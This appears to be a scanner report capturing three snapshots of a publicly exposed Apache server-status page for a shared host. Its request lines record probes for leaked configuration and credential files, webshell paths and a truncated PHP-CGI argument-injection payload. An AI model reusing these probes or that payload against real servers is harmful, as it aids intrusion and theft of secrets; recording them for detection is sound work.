162.158.82.164h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-31432089610/16/39756_ 9.348220166479320.02.351228.86 162.158.120.130h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/11/40383_ 9.3435040176460310.00.541208.98 162.158.120.146h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/10/39491_ 10.018250214210100.00.331184.93 162.158.82.133h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/11/40138_ 11.228270166712480.00.201177.73 162.158.42.20h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/20/38333_ 9.348250164405640.00.441094.35 162.158.120.208h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-31432089610/9/39657_ 9.258300397437490.00.121099.40 172.68.70.233h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/391/35539_ 32.151039178385290.016.231051.42 162.158.123.3h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/392/34641_ 32.1920213404970.011.66992.96 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-31432090930/406/35351_ 32.1910239914100.09.661067.27 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-31432090930/409/34558W 32.1100167501580.08.99975.02 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-31432090930/403/34888_ 32.19100136175180.07.591244.45 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-31432090930/407/35286_ 32.1980156559280.09.461041.71 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-31432090930/385/35031_ 32.1990154938210.015.791057.89 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-31432090930/367/34891_ 32.11596164577410.08.731069.08 40.122.52.254http/1.1barrerasdecontencion.com:443GET /w.php HTTP/1.1 2-31432090930/420/35308_ 32.169698158763810.08.201175.84 172.71.31.42h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/383/35220_ 32.1700186755220.047.991100.15 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 3-31432089590/353/39274_ 26.0520234566910.04.321241.61 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-31432089590/378/37963_ 26.0600183833930.08.161109.04 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-31432089590/340/38960_ 26.018333194764300.09.461223.73 172.71.98.86h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31432089590/326/38374_ 26.0600241849300.011.891251.67 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-31432089590/377/38355_ 26.0510165517820.09.361169.26 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-31432089590/348/38369_ 25.912580173826640.05.171176.18 162.158.172.79h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31432089590/346/38632_ 26.0620192345420.09.111297.72 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-31432089590/354/38677_ 26.0420272495360.021.871240.47 139.59.231.238http/1.1 3-31432089590/373/38032_ 26.0630821691210.06.871214.99 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-31432089590/341/39145_ 26.0610314743980.06.111254.85 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-31432089600/26/33175_ 11.3382879301203440.00.421053.23 178.128.207.138http/1.1barrerasdecontencion.com:443GET /config.json HTTP/1.1 4-31432089600/28/33245_ 10.1015050142974460.00.461139.00 43.157.195.60http/1.1 4-31432089600/23/33326_ 12.078280143814670.00.271153.11 172.71.146.190h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31432089600/21/33663_ 10.131507315159047660.00.891025.83 172.71.147.91h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31432089600/22/33120_ 10.098690163610670.00.851042.80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e328efae4d
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 07-Nov-2025 03:15:58 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 307 Parent Server MPM Generation: 306 Server uptime: 55 days 14 hours 54 minutes 55 seconds Server load: 0.09 0.07 0.07 Total accesses: 1762431 - Total Traffic: 54.7 GB - Total Duration: 1016961400 CPU Usage: u171.16 s196.71 cu9626.71 cs5389.48 - .32% CPU load .367 requests/sec - 11.9 kB/second - 32.5 kB/request - 577.022 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03037619no0yes010000 13037618no0yes010000 23037750no3yes010001 33037616no1yes19000 43037617no0yes010000 Sum504 149001 _____________________________________W____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-30630376190/81/33798_ 13.182150269412380.09.401239.45 104.23.213.60h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-30630376190/72/33268_ 13.232150419853820.03.301143.38 141.101.100.224h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30630376190/75/33580_ 14.0113610143520790.01.091150.83 104.23.251.104h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30630376190/73/33559_ 14.071366270154855470.016.881177.91 172.71.8.82h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30630376190/76/33849_ 13.0413720141718610.01.431125.91 172.68.164.147h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30630376190/73/33981_ 13.401366149157978050.01.671166.95 172.68.15.230h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30630376190/74/33944_ 14.0713720221469570.03.021069.85 172.71.24.92h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30630376190/73/33436_ 13.2313670138619340.08.101119.91 141.101.100.242h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30630376190/78/33779_ 14.472203149821980.02.741108.09 172.68.7.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-30630376190/90/33630_ 13.401361176175604050.01.711203.43 172.70.34.86h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30630376180/13/38494_ 9.8613130162320330.00.341225.77 162.158.186.19h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30630376180/23/39180_ 11.35120199579680.00.401267.98 162.158.187.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30630376180/21/38836_ 9.621313602192698830.00.201184.61 172.70.210.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30630376180/15/38546_ 11.422210186882550.00.461115.50 172.70.49.147h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30630376180/16/39386_ 11.812210165081320.00.321216.37 172.68.12.106h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30630376180/23/40004_ 11.442160174986680.00.231197.72 172.64.213.52h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30630376180/23/39095_ 11.87120212982450.00.741176.15 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 1-30630376180/16/39753_ 11.4113132164728710.00.441169.89 172.71.8.29h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30630376180/22/37940_ 10.9413130163007100.00.401066.77 198.41.227.130h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30630376180/20/39279_ 11.442160396173320.01.301091.23 172.70.123.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-30630377500/265/34550_ 25.2960173583470.07.71999.42 172.71.82.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-30630377500/248/33664_ 25.3150209416090.06.19937.76 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-30630377500/237/34378_ 25.138197235851150.04.731021.54 172.70.189.49h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-30630377500/241/33589_ 25.3060162475380.05.74946.84 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-30630377500/269/33948_ 25.3130131945010.027.991224.39 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-30630377500/267/34285_ 25.2160151685740.07.11996.98 172.68.7.119h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-30630377500/273/34102_ 25.07520150437030.012.121028.88 104.22.7.56h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-30630377500/243/33932_ 25.3120160202590.06.811035.58 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-30630377500/253/34258_ 25.3070154316420.034.791132.09 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-30630377500/257/34266_ 25.3010182449650.05.001040.11 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 3-30630376160/298/37893_ 27.2200228213170.07.701203.76 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-30630376160/273/36559_ 27.2200178647720.06.391076.99 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-30630376160/300/37564_ 27.2210187505520.06.711180.47 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-30630376160/289/37051_ 27.2220236535450.07.561216.48 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-30630376160/321/36966_ 27.2410159923570.09.241110.26 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-30630376160/308/37019_ 27.2240165401410.08.021146.58 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 3-30630376160/283/37300_ 27.2400185980260.07.551255.14 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-30630376160/298/37304W 27.2300267240160.07.151187.20 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-30630376160/295/36678_ 27.2420811839080.07.781188.40 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-30630376160/294/37757_ 27.2400309640370.07.581210.96 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-30630376170/20/32102_ 9.15596436296617770.00.631017.07 169.228.66.212http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-30630376170/18/32269_ 8.8413652136795880.00.151118.29 172.71.172.89h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-30630376170/22/32348_ 11.3260117138479880.00.281122.23 104.22.7.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-30630376170/22/32686_ 9.261366512154619920.00.36975.96 172.71.98.211h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-30630376170/19/32151_ 10.652160<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3b2e84b8f
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 05-Nov-2025 03:50:24 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 287 Parent Server MPM Generation: 286 Server uptime: 53 days 15 hours 29 minutes 21 seconds Server load: 0.03 0.05 0.03 Total accesses: 1678971 - Total Traffic: 51.9 GB - Total Duration: 971314310 CPU Usage: u112.09 s155.35 cu9263.24 cs5208.45 - .318% CPU load .362 requests/sec - 11.7 kB/second - 32.4 kB/request - 578.518 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02886366no0yes010000 12886364no0yes010000 22886367no0yes010000 32886365no1yes010000 42886496no1yes19000 Sum502 149000 ________________________________________W_________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-28628863660/0/32532_ 0.0081862263518900.00.001180.24 172.68.159.74h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28628863660/0/32021_ 0.00810414364940.00.001101.49 198.41.231.109h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28628863660/0/32365_ 0.00811137501350.00.001111.25 198.41.230.128h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28628863660/0/32357_ 0.00811146057990.00.001135.15 198.41.230.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28628863660/0/32630_ 0.00810134701720.00.001074.42 198.41.231.16h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-28628863660/0/32756_ 0.00810152966110.00.001137.41 198.41.231.52h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28628863660/0/32651_ 0.00810216895970.00.001016.66 104.23.237.30h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28628863660/0/32125_ 0.00812132296360.00.001059.99 172.105.128.12http/1.1 0-28628863660/0/32505_ 0.00810143419480.00.001069.40 198.41.230.118h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-28628863660/0/32370_ 0.00812169359010.00.001147.20 104.23.237.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28628863640/0/37139_ 0.0081162154714850.00.001132.50 95.171.6.101http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1 1-28628863640/0/37713_ 0.0081210191701460.00.001192.48 172.70.130.198h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28628863640/0/37355_ 0.008116184041830.00.001128.17 172.71.211.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28628863640/0/37202_ 0.008164173552280.00.001073.23 104.23.254.210h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28628863640/0/37949_ 0.008118156457910.00.001168.41 172.69.214.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28628863640/0/38563_ 0.0081305166934090.00.001125.99 172.71.184.91h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28628863640/0/37685_ 0.008118205242500.00.001109.18 172.71.223.109h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-28628863640/0/38382_ 0.0081233157174880.00.001085.88 104.23.168.64h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28628863640/0/36594_ 0.00812154130590.00.001008.90 104.23.237.78h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-28628863640/0/37914_ 0.008117387006760.00.001029.43 172.71.223.109h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28628863670/0/31421_ 0.0081328157250810.00.00868.79 172.70.175.108h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28628863670/0/30556_ 0.00811143190237190.00.00880.91 172.69.59.199h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28628863670/0/31416_ 0.008123221459180.00.00937.96 162.158.120.160h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28628863670/0/30560_ 0.008131147574110.00.00877.27 185.247.137.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-28628863670/0/30991_ 0.00811118470270.00.001131.12 172.69.7.75h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28628863670/0/31278_ 0.00811017134617050.00.00903.34 87.236.176.7http/1.1 2-28628863670/0/31055_ 0.0081305132612120.00.00937.14 172.71.95.26h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28628863670/0/30968_ 0.008116145671530.00.00936.10 172.70.223.241h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28628863670/1/31264_ 0.0260137948670.00.00991.33 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 2-28628863670/0/31146_ 0.00613167632930.00.00965.48 172.64.217.61h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28628863650/4/35799_ 0.1200220089890.00.021125.11 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-28628863650/4/34581_ 0.1120170578540.00.031028.39 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 3-28628863650/4/35449_ 0.1210178610650.00.031147.13 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-28628863650/5/34925_ 0.1200226806170.00.061162.72 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-28628863650/1/34827_ 0.0920150879270.00.001071.13 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-28628863650/4/34861_ 0.1200156355100.00.031103.91 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-28628863650/0/35195_ 0.0005089175904680.00.001198.01 87.236.176.15http/1.1 3-28628863650/1/35230_ 0.040318259600290.00.021133.20 104.23.209.77h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28628863650/2/34605_ 0.1120802375470.00.001090.04 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-28628863650/2/35689_ 0.1120301286870.00.001130.62 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-28628864960/3/31529W 0.1100286625360.00.031002.60 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-28628864960/2/31764_ 0.086357133025820.00.041104.57 172.71.194.25h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-28628864960/2/31833_ 0.1140135742670.00.001097.00 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 4-28628864960/1/32096_ 0.1041148878160.00.00960.77 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-28628864960/1/31590_ 0.1140153440950.00.001005.43 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 4-28628864960
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e37d5003c4
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 03-Nov-2025 13:01:02 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 277 Parent Server MPM Generation: 276 Server uptime: 52 days 40 minutes Server load: 0.75 0.31 0.25 Total accesses: 1627835 - Total Traffic: 50.4 GB - Total Duration: 811163015 CPU Usage: u173.26 s174.38 cu8917.63 cs5017.04 - .318% CPU load .362 requests/sec - 11.8 kB/second - 32.5 kB/request - 498.308 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02719671no1yes19000 12719776no0yes010000 22719669no4yes010002 32719670no0yes010000 42719805no0yes010000 Sum505 149002 ________W_________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-27627196710/390/31707_ 29.9710250752760.012.191138.64 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-27627196710/403/31190_ 29.9630149687270.013.651081.70 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-27627196710/371/31511_ 29.46238128147880.08.551055.69 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27627196710/424/31512_ 29.9620140674910.056.111094.66 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-27627196710/451/31695_ 29.9710128221690.013.821028.00 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-27627196710/416/31990_ 29.89232149449530.011.641121.50 87.58.86.94http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 0-27627196710/389/31830_ 29.9720202387570.021.36987.92 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-27627196710/387/31365_ 29.90340127720890.037.151042.46 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27627196710/432/31720W 29.9600139866600.020.801041.49 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-27627196710/367/31538_ 29.954594165882380.09.621118.58 172.71.182.111h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27627197760/133/36180_ 10.983180150391890.013.961094.00 188.114.111.20h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27627197760/152/36762_ 10.7231440188092820.02.621172.21 172.71.24.191h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27627197760/162/36486_ 10.52314277177044280.03.061111.43 162.158.123.72h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27627197760/187/36361_ 11.023050168885350.01.511057.15 162.158.123.27h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27627197760/139/37119_ 10.503182152450000.03.291152.81 172.70.224.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27627197760/136/37766_ 10.693050162518310.02.591111.79 162.158.120.208h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27627197760/135/36835_ 11.0231936201077700.03.291092.67 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27627197760/132/37496_ 10.683230151139770.02.841066.06 162.158.122.19h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27627197760/123/35695_ 10.683050150655210.022.76991.34 162.158.122.201h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-27627197760/137/37012_ 11.04310203142816470.03.171011.24 104.22.7.170h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-27627196690/365/30266_ 30.3800152613920.013.08831.42 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 2-27627196690/328/29489_ 30.4000185706480.07.20852.35 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-27627196690/342/30359_ 30.3820217304790.010.12915.34 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 2-27627196690/305/29456_ 30.3800141668460.010.01840.25 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27627196690/339/29881_ 30.3900113537360.09.411092.16 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-27627196690/345/30059_ 30.3900125506120.015.69878.19 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-27627196690/320/29897_ 30.3920127268000.023.88889.17 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-27627196690/347/29819_ 30.3910140309610.012.39884.23 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-27627196690/320/30155_ 30.3800126146070.09.60946.59 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 2-27627196690/362/29966_ 30.3900162112880.028.82938.83 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-27627196700/63/34296_ 7.864000214623450.03.971096.49 162.158.122.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27627196700/56/33148_ 7.641910165369230.01.08992.89 162.158.122.149h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27627196700/63/34003_ 7.7340115172705250.00.781117.25 195.76.169.226h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27627196700/59/33459_ 7.934050218327180.02.631130.51 188.114.111.233h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27627196700/59/33418_ 7.474011140551460.02.891037.55 172.70.224.186h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27627196700/60/33432_ 8.0019623150697890.01.881057.95 195.76.169.226h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27627196700/52/33722_ 7.481910122925570.00.451166.19 172.70.224.175h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27627196700/55/33779_ 7.13400459249579790.02.961103.51 172.71.218.252h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27627196700/51/33120_ 7.634010166528060.00.621038.80 162.158.120.199h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27627196700/52/34262_ 7.924060173010720.00.641100.35 162.158.123.81h2lcftech.es:443idle, streams: 0/1/1/0/0 